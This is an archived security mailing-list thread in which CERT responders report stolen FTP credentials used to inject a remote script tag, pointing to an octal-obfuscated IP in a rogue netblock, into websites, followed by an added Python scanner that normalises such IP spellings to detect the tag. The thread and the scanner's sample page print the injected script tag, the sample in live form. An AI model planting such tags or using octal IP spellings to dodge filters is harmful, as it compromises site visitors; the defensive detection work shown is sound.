[nsp-sec] Stolen FTP credentials
Carles Fragoso
cfragoso at cesicat.cat
Wed Mar 16 11:50:23 EDT 2011
Hi Thomas,
Several ISPs here in Spain have confirmed this behaviour to us ...
... same inserted script ...
< script src='hxxp://0133.0331.0242.0034/0314.php?js'>< / script >
... performed through FTP connections (downloading the index file and uploading it with modified code) from a couple of different IP addresses (Romania and USA).
Those who have replied to my notification have confirmed that the credentials were fresh and had been used to log in.
Regards,
-- Carlos Fragoso (CESICAT-CERT)
On Mar 16, 2011, at 4:16 PM, Thomas Hungenberg wrote:
----------- nsp-security Confidential --------
It appears the stolen FTP credentials are used to inject the following code
into corresponding websites (XXX inserted):
<scrXXipt src='htXXXtp://0133.0331.0242.0034/0314.php?js'></scrXXXipt>
0133.0331.0242.0034 = 91.217.162.28
Known rogue netblock:
inetnum: 91.217.162.0 - 91.217.162.255
netname: VOEJNA-NET
descr: Voejkova Nadezhda
country: UA
Cheers,
Thomas
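The injected tag in Thomas's message points at an IP address written in dotted-octal form (0133.0331.0242.0034 = 91.217.162.28), a spelling that inet_aton accepts and that simple grep rules for "91.217.162." miss. The script below is an added example, not code from the thread or from CERT-Bund: it normalises inet_aton-style host literals (octal, hex, decimal and the 1-, 2- and 3-part short forms, going a little beyond the single octal case in the mail) and flags `<script src=...>` tags whose resolved address falls inside the rogue netblock named above. The sample index page is constructed for the example; the netblock 91.217.162.0/24 is the one from the thread.

```python
import ipaddress
import re

# Netblock named in the thread; extend with further ranges as needed.
ROGUE_NETS = [ipaddress.ip_network("91.217.162.0/24")]

# Matches <script ... src='...'>, tolerating the spaces seen in defanged copies ("< script").
SCRIPT_SRC_RE = re.compile(r"<\s*script[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)
# Pulls the host out of scheme://host/... or protocol-relative //host/...
HOST_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*:)?//([^/:?#]+)", re.IGNORECASE)
COMPONENT_RE = re.compile(r"0x[0-9a-f]+|[0-9]+", re.IGNORECASE)


def _component(tok):
    """Interpret one dotted component as inet_aton does: 0x.. hex, leading 0 octal, else decimal."""
    if not COMPONENT_RE.fullmatch(tok):
        raise ValueError(tok)
    if tok.lower().startswith("0x"):
        return int(tok[2:], 16)
    if len(tok) > 1 and tok.startswith("0"):
        return int(tok, 8)
    return int(tok, 10)


def normalize_ip(host):
    """Return the dotted-decimal form of an inet_aton-style IPv4 literal, or None if host is not one."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        vals = [_component(p) for p in parts]
    except ValueError:
        return None  # a hostname, not an IP literal
    # inet_aton semantics: the last component fills all remaining bytes.
    if len(vals) == 4:
        limits = (255, 255, 255, 255)
        n = (vals[0] << 24) | (vals[1] << 16) | (vals[2] << 8) | vals[3]
    elif len(vals) == 3:
        limits = (255, 255, 0xFFFF)
        n = (vals[0] << 24) | (vals[1] << 16) | vals[2]
    elif len(vals) == 2:
        limits = (255, 0xFFFFFF)
        n = (vals[0] << 24) | vals[1]
    else:
        limits = (0xFFFFFFFF,)
        n = vals[0]
    if any(v > lim for v, lim in zip(vals, limits)):
        return None
    return str(ipaddress.IPv4Address(n))


def scan_html(html, rogue_nets=ROGUE_NETS):
    """Return one finding per <script src=...> whose host is an IP literal in any inet_aton spelling."""
    findings = []
    for m in SCRIPT_SRC_RE.finditer(html):
        src = m.group(1)
        hm = HOST_RE.match(src)
        if not hm:
            continue
        host = hm.group(1)
        ip = normalize_ip(host)
        if ip is None:
            continue  # plain hostnames are left to reputation checks elsewhere
        addr = ipaddress.ip_address(ip)
        findings.append({
            "src": src,
            "host_literal": host,
            "ip": ip,
            "obfuscated": host != ip,          # literal differs from canonical dotted decimal
            "rogue_netblock": any(addr in net for net in rogue_nets),
        })
    return findings


# Constructed sample of an index file after the kind of modification described in the thread
# (the defanging "hxxp" undone so the regexes see a real URL). The cdn.example.com tag is benign filler.
SAMPLE_INDEX = """<html><body>
<h1>Welcome</h1>
<script src='http://0133.0331.0242.0034/0314.php?js'></script>
<script src="https://cdn.example.com/app.js"></script>
<script src="http://0x5b.0xd9.0xa2.0x1c/x.php"></script>
</body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_INDEX):
        flag = "ROGUE" if f["rogue_netblock"] else "check"
        print(f"{flag}: {f['host_literal']} -> {f['ip']} ({f['src']})")
```

Run it over a directory of freshly downloaded index files to find the injected tag regardless of how the address is spelled; anything that resolves into the netblock is a strong signal that the account's FTP credentials were used.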
Thomas Hungenberg wrote:
----------- nsp-security Confidential --------
Hi,
Please find below a list of stolen FTP credentials found in recent dropzone data.
Format: ASN | IP | CC | hostname | username | sanitized password
- Thomas
CERT-Bund Incident Response & Anti-Malware Team
_______________________________________________
nsp-security mailing list
nsp-security at puck.nether.net
https://puck.nether.net/mailman/listinfo/nsp-security
Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
community. Confidentiality is essential for effective Internet security counter-measures.
_______________________________________________